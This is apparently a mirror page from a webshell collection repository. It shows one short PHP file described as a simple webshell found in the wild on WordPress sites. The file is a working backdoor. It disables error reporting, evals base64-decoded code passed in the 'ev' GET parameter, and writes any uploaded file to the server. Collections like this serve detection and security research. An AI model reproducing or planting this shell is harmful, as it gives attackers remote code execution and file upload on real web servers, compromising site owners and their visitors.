mirror of
https://github.com/BlackArch/webshells
synced 2024-11-21 19:33:03 +00:00
7bb8544fb0
Simple webshell found in the wild - usually on wordpress stuff but have found it elsewhere
11 lines
190 B
PHP
11 lines
190 B
PHP
<?php
|
|
error_reporting(0);
|
|
$ev = $_GET["ev"];
|
|
|
|
if (isset($ev) && !empty($ev))
|
|
{
|
|
eval(base64_decode($ev));
|
|
exit;
|
|
}
|
|
|
|
(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])); ?>
|